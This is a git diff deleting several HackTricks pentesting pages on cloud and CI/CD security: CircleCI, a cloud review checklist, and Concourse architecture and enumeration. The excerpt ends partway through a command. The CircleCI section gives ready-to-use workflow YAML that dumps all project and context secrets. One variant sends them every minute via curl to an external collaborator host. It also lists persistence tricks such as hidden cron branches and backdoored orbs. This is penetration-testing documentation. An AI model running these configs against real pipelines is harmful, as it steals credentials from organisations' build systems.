and user migration through AWS Lambda triggers. - -## **Identity pools** - -With an identity pool, your users can **obtain temporary AWS credentials to access AWS services**, such as Amazon S3 and DynamoDB. Identity pools support anonymous guest users, as well as the following identity providers that you can use to authenticate users for identity pools: - -* Amazon Cognito user pools -* Social sign-in with Facebook, Google, Login with Amazon, and Sign in with Apple -* OpenID Connect (OIDC) providers -* SAML identity providers -* Developer authenticated identities - -To save user profile information, your identity pool needs to be integrated with a user pool. - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/circleci.md b/cloud-security/circleci.md deleted file mode 100644 index d26f49b75..000000000 --- a/cloud-security/circleci.md +++ /dev/null @@ -1,291 +0,0 @@ -# CircleCI - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- -## Basic Information - -[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) is a Continuos Integration platform where you ca **define templates** indicating what you want it to do with some code and when to do it. This way you can **automate testing** or **deployments** directly **from your repo master branch** for example. - -## Permissions - -**CircleCI** **inherits the permissions** from github and bitbucket related to the **account** that logs in.\ -In my testing I checked that as long as you have **write permissions over the repo in github**, you are going to be able to **manage its project settings in CircleCI** (set new ssh keys, get project api keys, create new branches with new CircleCI configs...). - -However, you need to be a a **repo admin** in order to **convert the repo into a CircleCI project**. - -## Env Variables & Secrets - -According to [**the docs**](https://circleci.com/docs/2.0/env-vars/) there are different ways to **load values in environment variables** inside a workflow. - -### Built-in env variables - -Every container run by CircleCI will always have [**specific env vars defined in the documentation**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables) like `CIRCLE_PR_USERNAME`, `CIRCLE_PROJECT_REPONAME` or `CIRCLE_USERNAME`. - -### Clear text - -You can declare them in clear text inside a **command**: - -```yaml -- run: - name: "set and echo" - command: | - SECRET="A secret" - echo $SECRET -``` - -You can declare them in clear text inside the **run environment**: - -```yaml -- run: - name: "set and echo" - command: echo $SECRET - environment: - SECRET: A secret -``` - -You can declare them in clear text inside the **build-job environment**: - -```yaml -jobs: - build-job: - docker: - - image: cimg/base:2020.01 - environment: - SECRET: A secret -``` - -You can declare them in clear text inside the **environment of a container**: - -```yaml -jobs: - build-job: - docker: - - image: cimg/base:2020.01 - environment: - SECRET: A secret -``` - -### Project Secrets - -These are **secrets** that are only going to be **accessible** by the **project** (by **any branch**).\ -You can see them **declared in** _https://app.circleci.com/settings/project/github/\/\/environment-variables_ - -![](<../.gitbook/assets/image (662) (1) (1).png>) - -{% hint style="danger" %} -The "**Import Variables**" functionality allows to **import variables from other projects** to this one. -{% endhint %} - -### Context Secrets - -These are secrets that are **org wide**. By **default any repo** is going to be able to **access any secret** stored here: - -![](<../.gitbook/assets/image (661).png>) - -{% hint style="success" %} -However, note that a different group (instead of All members) can be **selected to only give access to the secrets to specific people**.\ -This is currently one of the best ways to **increase the security of the secrets**, to not allow everybody to access them but just some people. -{% endhint %} - -## Attacks - -### Search Clear Text Secrets - -If you have **access to the VCS** (like github) check the file `.circleci/config.yml` of **each repo on each branch** and **search** for potential **clear text secrets** stored in there. - -### Secret Env Vars & Context enumeration - -Checking the code you can find **all the secrets names** that are being **used** in each `.circleci/config.yml` file. You can also get the **context names** from those files or check them in the web console: _https://app.circleci.com/settings/organization/github/\/contexts_. - -### Exfiltrate Project secrets - -{% hint style="warning" %} -In order to **exfiltrate ALL** the project and context **SECRETS** you **just** need to have **WRITE** access to **just 1 repo** in the whole github org (_and your account must have access to the contexts but by default everyone can access every context_). -{% endhint %} - -{% hint style="danger" %} -The "**Import Variables**" functionality allows to **import variables from other projects** to this one. Therefore, an attacker could **import all the project variables from all the repos** and then **exfiltrate all of them together**. -{% endhint %} - -All the project secrets always are set in the env of the jobs, so just calling env and obfuscating it in base64 will exfiltrate the secrets in the **workflows web log console**: - -```yaml -version: 2.1 - -jobs: - exfil-env: - docker: - - image: cimg/base:stable - steps: - - checkout - - run: - name: "Exfil env" - command: "env | base64" - -workflows: - exfil-env-workflow: - jobs: - - exfil-env -``` - -If you **don't have access to the web console** but you have **access to the repo** and you know that CircleCI is used, you can just **create a workflow** that is **triggered every minute** and that **exfils the secrets to an external address**: - -```yaml -version: 2.1 - -jobs: - exfil-env: - docker: - - image: cimg/base:stable - steps: - - checkout - - run: - name: "Exfil env" - command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`" - -# I filter by the repo branch where this config.yaml file is located: circleci-project-setup -workflows: - exfil-env-workflow: - triggers: - - schedule: - cron: "* * * * *" - filters: - branches: - only: - - circleci-project-setup - jobs: - - exfil-env -``` - -### Exfiltrate Context Secrets - -You need to **specify the context name** (this will also exfiltrate the project secrets): - -```yaml -``` - -```yaml -version: 2.1 - -jobs: - exfil-env: - docker: - - image: cimg/base:stable - steps: - - checkout - - run: - name: "Exfil env" - command: "env | base64" - -workflows: - exfil-env-workflow: - jobs: - - exfil-env: - context: Test-Context -``` - -If you **don't have access to the web console** but you have **access to the repo** and you know that CircleCI is used, you can just **modify a workflow** that is **triggered every minute** and that **exfils the secrets to an external address**: - -```yaml -version: 2.1 - -jobs: - exfil-env: - docker: - - image: cimg/base:stable - steps: - - checkout - - run: - name: "Exfil env" - command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`" - -# I filter by the repo branch where this config.yaml file is located: circleci-project-setup -workflows: - exfil-env-workflow: - triggers: - - schedule: - cron: "* * * * *" - filters: - branches: - only: - - circleci-project-setup - jobs: - - exfil-env: - context: Test-Context -``` - -{% hint style="warning" %} -Just creating a new `.circleci/config.yml` in a repo **isn't enough to trigger a circleci build**. You need to **enable it as a project in the circleci console**. -{% endhint %} - -### Escape to Cloud - -**CircleCI** gives you the option to run **your builds in their machines or in your own**.\ -By default their machines are located in GCP, and you initially won't be able to fid anything relevant. However, if a victim is running the tasks in **their own machines (potentially, in a cloud env)**, you might find a **cloud metadata endpoint with interesting information on it**. - -Notice that in the previous examples it was launched everything inside a docker container, but you can also **ask to launch a VM machine** (which may have different cloud permissions): - -```yaml -jobs: - exfil-env: - #docker: - # - image: cimg/base:stable - machine: - image: ubuntu-2004:current -``` - -Or even a docker container with access to a remote docker service: - -```yaml -jobs: - exfil-env: - docker: - - image: cimg/base:stable - steps: - - checkout - - setup_remote_docker: - version: 19.03.13 -``` - -### Persistence - -* It's possible to **create** **user tokens in CircleCI** to access the API endpoints with the users access. - * _https://app.circleci.com/settings/user/tokens_ -* It's possible to **create projects tokens** to access the project with the permissions given to the token. - * _https://app.circleci.com/settings/project/github/\/\/api_ -* It's possible to **add SSH keys** to the projects. - * _https://app.circleci.com/settings/project/github/\/\/ssh_ -* It's possible to **create a cron job in hidden branch** in an unexpected project that is **leaking** all the **context env** vars everyday. - * Or even create in a branch / modify a known job that will **leak** all context and **projects secrets** everyday. -* If you are a github owner you can **allow unverified orbs** and configure one in a job as **backdoor** -* You can find a **command injection vulnerability** in some task and **inject commands** via a **secret** modifying its value - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
diff --git a/cloud-security/cloud-security-review.md b/cloud-security/cloud-security-review.md deleted file mode 100644 index 691e26fdf..000000000 --- a/cloud-security/cloud-security-review.md +++ /dev/null @@ -1,149 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -**Check for nice cloud hacking tricks in** [**https://hackingthe.cloud**](https://hackingthe.cloud) - -# Generic tools - -There are several tools that can be used to test different cloud environments. The installation steps and links are going to be indicated in this section. - -## [ScoutSuite](https://github.com/nccgroup/ScoutSuite) - -AWS, Azure, GCP, Alibaba Cloud, Oracle Cloud Infrastructure - -``` -pip3 install scoutsuite -``` - -## [cs-suite](https://github.com/SecurityFTW/cs-suite) - -AWS, GCP, Azure, DigitalOcean - -``` -git clone https://github.com/SecurityFTW/cs-suite.git && cd cs-suite/ -pip install virtualenv -virtualenv -p python2.7 venv -source venv/bin/activate -pip install -r requirements.txt -python cs.py --help -``` - -## Nessus - -Nessus has an _**Audit Cloud Infrastructure**_ scan supporting: AWS, Azure, Office 365, Rackspace, Salesforce. Some extra configurations in **Azure** are needed to obtain a **Client Id**. - -## Common Sense - -Take a look to the **network access rules** and detect if the services are correctly protected: - -* ssh available from everywhere? -* Unencrypted services running (telnet, http, ...)? -* Unprotected admin consoles? -* In general, check that all services are correctly protected depending on their needs - -# Azure - -Access the portal here: [http://portal.azure.com/](http://portal.azure.com)\ -To start the tests you should have access with a user with **Reader permissions over the subscription** and **Global Reader role in AzureAD**. If even in that case you are **not able to access the content of the Storage accounts** you can fix it with the **role Storage Account Contributor**. - -It is recommended to **install azure-cli** in a **linux** and **windows** virtual machines (to be able to run powershell and python scripts): [https://docs.microsoft.com/en-us/cli/azure/install-azure-cli?view=azure-cli-latest](https://docs.microsoft.com/en-us/cli/azure/install-azure-cli?view=azure-cli-latest)\ -Then, run `az login` to login. Note the **account information** and **token** will be **saved** inside _\/.azure_ (in both Windows and Linux). - -Remember that if the **Security Centre Standard Pricing Tier** is being used and **not** the **free** tier, you can **generate** a **CIS compliance scan report** from the azure portal. Go to _Policy & Compliance-> Regulatory Compliance_ (or try to access [https://portal.azure.com/#blade/Microsoft\_Azure\_Security/SecurityMenuBlade/22](https://portal.azure.com/#blade/Microsoft\_Azure\_Security/SecurityMenuBlade/22)).\ -\_\_If the company is not paying for a Standard account you may need to review the **CIS Microsoft Azure Foundations Benchmark** by "hand" (you can get some help using the following tools). Download it from [**here**](https://www.newnettechnologies.com/cis-benchmark.html?keyword=\&gclid=Cj0KCQjwyPbzBRDsARIsAFh15JYSireQtX57C6XF8cfZU3JVjswtaLFJndC3Hv45YraKpLVDgLqEY6IaAhsZEALw\_wcB#microsoft-azure). - -## Run scanners - -Run the scanners to look for **vulnerabilities** and **compare** the security measures implemented with **CIS**. - -```bash -pip install scout -scout azure --cli --report-dir - -#Fix azureaudit.py before launching cs.py -#Adding "j_res = {}" on line 1074 -python cs.py -env azure - -#Azucar is an Azure security scanner for PowerShell (https://github.com/nccgroup/azucar) -#Run it from its folder -.\Azucar.ps1 -AuthMode Interactive -ForceAuth -ExportTo EXCEL - -#Azure-CIS-Scanner,CIS scanner for Azure (https://github.com/kbroughton/azure_cis_scanner) -pip3 install azure-cis-scanner #Install -azscan #Run, login before with `az login` -``` - -## Attack Graph - -[**Stormspotter** ](https://github.com/Azure/Stormspotter)creates an β€œattack graph” of the resources in an Azure subscription. It enables red teams and pentesters to visualize the attack surface and pivot opportunities within a tenant, and supercharges your defenders to quickly orient and prioritize incident response work. - -## More checks - -* Check for a **high number of Global Admin** (between 2-4 are recommended). Access it on: [https://portal.azure.com/#blade/Microsoft\_AAD\_IAM/ActiveDirectoryMenuBlade/Overview](https://portal.azure.com/#blade/Microsoft\_AAD\_IAM/ActiveDirectoryMenuBlade/Overview) -* Global admins should have MFA activated. Go to Users and click on Multi-Factor Authentication button. - -![](<../.gitbook/assets/image (293).png>) - -* Dedicated admin account shouldn't have mailboxes (they can only have mailboxes if they have Office 365). -* Local AD shouldn't be sync with Azure AD if not needed([https://portal.azure.com/#blade/Microsoft\_AAD\_IAM/ActiveDirectoryMenuBlade/AzureADConnect](https://portal.azure.com/#blade/Microsoft\_AAD\_IAM/ActiveDirectoryMenuBlade/AzureADConnect)). And if synced Password Hash Sync should be enabled for reliability. In this case it's disabled: - -![](<../.gitbook/assets/image (294).png>) - -* **Global Administrators** shouldn't be synced from a local AD. Check if Global Administrators emails uses the domain **onmicrosoft.com**. If not, check the source of the user, the source should be Azure Active Directory, if it comes from Windows Server AD, then report it. - -![](<../.gitbook/assets/image (295).png>) - -* **Standard tier** is recommended instead of free tier (see the tier being used in _Pricing & Settings_ or in [https://portal.azure.com/#blade/Microsoft\_Azure\_Security/SecurityMenuBlade/24](https://portal.azure.com/#blade/Microsoft\_Azure\_Security/SecurityMenuBlade/24)) -* **Periodic SQL servers scans**: - - _Select the SQL server_ --> _Make sure that 'Advanced data security' is set to 'On'_ --> _Under 'Vulnerability assessment settings', set 'Periodic recurring scans' to 'On', and configure a storage account for storing vulnerability assessment scan results_ --> _Click Save_ -* **Lack of App Services restrictions**: Look for "App Services" in Azure ([https://portal.azure.com/#blade/HubsExtension/BrowseResource/resourceType/Microsoft.Web%2Fsites](https://portal.azure.com/#blade/HubsExtension/BrowseResource/resourceType/Microsoft.Web%2Fsites)) and check if anyone is being used. In that case check go through each App checking for "Access Restrictions" and there aren't rules, report it. The access to the app service should be restricted according to the needs. - -# Office365 - -You need **Global Admin** or at least **Global Admin Reader** (but note that Global Admin Reader is a little bit limited). However, those limitations appear in some PS modules and can be bypassed accessing the features via the web application. - -# AWS - -Get objects in graph: [https://github.com/FSecureLABS/awspx](https://github.com/FSecureLABS/awspx) - -# GPC - -{% content-ref url="gcp-security/" %} -[gcp-security](gcp-security/) -{% endcontent-ref %} - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/concourse/README.md b/cloud-security/concourse/README.md deleted file mode 100644 index 2745687e4..000000000 --- a/cloud-security/concourse/README.md +++ /dev/null @@ -1,67 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -**Concourse allows you to build pipelines to automatically run tests, actions and build images whenever you need it (time based, when something happens...)** - -# Concourse Architecture - -Learn how the concourse environment is structured in: - -{% content-ref url="concourse-architecture.md" %} -[concourse-architecture.md](concourse-architecture.md) -{% endcontent-ref %} - -# Run Concourse Locally - -Learn how you can run a concourse environment locally to do your own tests in: - -{% content-ref url="concourse-lab-creation.md" %} -[concourse-lab-creation.md](concourse-lab-creation.md) -{% endcontent-ref %} - -# Enumerate & Attack Concourse - -Learn how you can enumerate the concourse environment and abuse it in: - -{% content-ref url="concourse-enumeration-and-attacks.md" %} -[concourse-enumeration-and-attacks.md](concourse-enumeration-and-attacks.md) -{% endcontent-ref %} - -# References - -* [https://concourse-ci.org/internals.html#architecture-worker](https://concourse-ci.org/internals.html#architecture-worker) - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/concourse/concourse-architecture.md b/cloud-security/concourse/concourse-architecture.md deleted file mode 100644 index 09f585ac4..000000000 --- a/cloud-security/concourse/concourse-architecture.md +++ /dev/null @@ -1,52 +0,0 @@ -# Concourse Architecture - -## Concourse Architecture - -
- -Support HackTricks and get benefits! - -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- -## Architecture - -![](<../../.gitbook/assets/image (307) (3) (1).png>) - -### ATC: web UI & build scheduler - -The ATC is the heart of Concourse. It runs the **web UI and API** and is responsible for all pipeline **scheduling**. It **connects to PostgreSQL**, which it uses to store pipeline data (including build logs). - -The [checker](https://concourse-ci.org/checker.html)'s responsibility is to continously checks for new versions of resources. The [scheduler](https://concourse-ci.org/scheduler.html) is responsible for scheduling builds for a job and the [build tracker](https://concourse-ci.org/build-tracker.html) is responsible for running any scheduled builds. The [garbage collector](https://concourse-ci.org/garbage-collector.html) is the cleanup mechanism for removing any unused or outdated objects, such as containers and volumes. - -### TSA: worker registration & forwarding - -The TSA is a **custom-built SSH server** that is used solely for securely **registering** [**workers**](https://concourse-ci.org/internals.html#architecture-worker) with the [ATC](https://concourse-ci.org/internals.html#component-atc). - -The TSA by **default listens on port `2222`**, and is usually colocated with the [ATC](https://concourse-ci.org/internals.html#component-atc) and sitting behind a load balancer. - -The **TSA implements CLI over the SSH connection,** supporting [**these commands**](https://concourse-ci.org/internals.html#component-tsa). - -### Workers - -In order to execute tasks concourse must have some workers. These workers **register themselves** via the [TSA](https://concourse-ci.org/internals.html#component-tsa) and run the services [**Garden**](https://github.com/cloudfoundry-incubator/garden) and [**Baggageclaim**](https://github.com/concourse/baggageclaim). - -* **Garden**: This is the **Container Manage AP**I, usually run in **port 7777** via **HTTP**. -* **Baggageclaim**: This is the **Volume Management API**, usually run in **port 7788** via **HTTP**. - -
- -Support HackTricks and get benefits! - -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
diff --git a/cloud-security/concourse/concourse-enumeration-and-attacks.md b/cloud-security/concourse/concourse-enumeration-and-attacks.md deleted file mode 100644 index 52d1baa21..000000000 --- a/cloud-security/concourse/concourse-enumeration-and-attacks.md +++ /dev/null @@ -1,466 +0,0 @@ -# Concourse Enumeration & Attacks - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- -## User Roles & Permissions - -Concourse comes with five roles: - -* _Concourse_ **Admin**: This role is only given to owners of the **main team** (default initial concourse team). Admins can **configure other teams** (e.g.: `fly set-team`, `fly destroy-team`...). The permissions of this role cannot be affected by RBAC. -* **owner**: Team owners can **modify everything within the team**. -* **member**: Team members can **read and write** within the **teams assets** but cannot modify the team settings. -* **pipeline-operator**: Pipeline operators can perform **pipeline operations** such as triggering builds and pinning resources, however they cannot update pipeline configurations. -* **viewer**: Team viewers have **"read-only" access to a team** and its pipelines. - -{% hint style="info" %} -Moreover, the **permissions of the roles owner, member, pipeline-operator and viewer can be modified** configuring RBAC (configuring more specifically it's actions). Read more about it in: [https://concourse-ci.org/user-roles.html](https://concourse-ci.org/user-roles.html) -{% endhint %} - -Note that Concourse **groups pipelines inside Teams**. Therefore users belonging to a Team will be able to manage those pipelines and **several Teams** might exist. A user can belong to several Teams and have different permissions inside each of them. - -## Vars & Credential Manager - -In the YAML configs you can configure values using the syntax `((`_`source-name`_`:`_`secret-path`_`.`_`secret-field`_`))`.\ -The **source-name is optional**, and if omitted, the [cluster-wide credential manager](https://concourse-ci.org/vars.html#cluster-wide-credential-manager) will be used, or the value may be provided [statically](https://concourse-ci.org/vars.html#static-vars).\ -The **optional \_secret-field**\_ specifies a field on the fetched secret to read. If omitted, the credential manager may choose to read a 'default field' from the fetched credential if the field exists.\ -Moreover, the _**secret-path**_ and _**secret-field**_ may be surrounded by double quotes `"..."` if they **contain special characters** like `.` and `:`. For instance, `((source:"my.secret"."field:1"))` will set the _secret-path_ to `my.secret` and the _secret-field_ to `field:1`. - -### Static Vars - -Static vars can be specified in **tasks steps**: - -```yaml - - task: unit-1.13 - file: booklit/ci/unit.yml - vars: {tag: 1.13} -``` - -Or using the following `fly` **arguments**: - -* `-v` or `--var` `NAME=VALUE` sets the string `VALUE` as the value for the var `NAME`. -* `-y` or `--yaml-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the var `NAME`. -* `-i` or `--instance-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the instance var `NAME`. See [Grouping Pipelines](https://concourse-ci.org/instanced-pipelines.html) to learn more about instance vars. -* `-l` or `--load-vars-from` `FILE` loads `FILE`, a YAML document containing mapping var names to values, and sets them all. - -### Credential Management - -There are different ways a **Credential Manager can be specified** in a pipeline, read how in [https://concourse-ci.org/creds.html](https://concourse-ci.org/creds.html).\ -Moreover, Concourse supports different credential managers: - -* [The Vault credential manager](https://concourse-ci.org/vault-credential-manager.html) -* [The CredHub credential manager](https://concourse-ci.org/credhub-credential-manager.html) -* [The AWS SSM credential manager](https://concourse-ci.org/aws-ssm-credential-manager.html) -* [The AWS Secrets Manager credential manager](https://concourse-ci.org/aws-asm-credential-manager.html) -* [Kubernetes Credential Manager](https://concourse-ci.org/kubernetes-credential-manager.html) -* [The Conjur credential manager](https://concourse-ci.org/conjur-credential-manager.html) -* [Caching credentials](https://concourse-ci.org/creds-caching.html) -* [Redacting credentials](https://concourse-ci.org/creds-redacting.html) -* [Retrying failed fetches](https://concourse-ci.org/creds-retry-logic.html) - -{% hint style="danger" %} -Note that if you have some kind of **write access to Concourse** you can create jobs to **exfiltrate those secrets** as Concourse needs to be able to access them. -{% endhint %} - -## Concourse Enumeration - -In order to enumerate a concourse environment you first need to **gather valid credentials** or to find an **authenticated token** probably in a `.flyrc` config file. - -### Login and Current User enum - -* To login you need to know the **endpoint**, the **team name** (default is `main`) and a **team the user belongs to**: - * `fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]` -* Get configured **targets**: - * `fly targets` -* Get if the configured **target connection** is still **valid**: - * `fly -t status` -* Get **role** of the user against the indicated target: - * `fly -t userinfo` - -### Teams & Users - -* Get a list of the Teams - * `fly -t teams` -* Get roles inside team - * `fly -t get-team -n ` -* Get a list of users - * `fly -t active-users` - -### Pipelines - -* **List** pipelines: - * `fly -t pipelines -a` -* **Get** pipeline yaml (**sensitive information** might be found in the definition): - * `fly -t get-pipeline -p ` -* Get all pipeline **config declared vars** - * `for pipename in $(fly -t pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t get-pipeline -p $pipename -j | grep -Eo '"vars":[^}]+'; done` -* Get all the **pipelines secret names used** (if you can create/modify a job or hijack a container you could exfiltrate them): - -```bash -rm /tmp/secrets.txt; -for pipename in $(fly -t 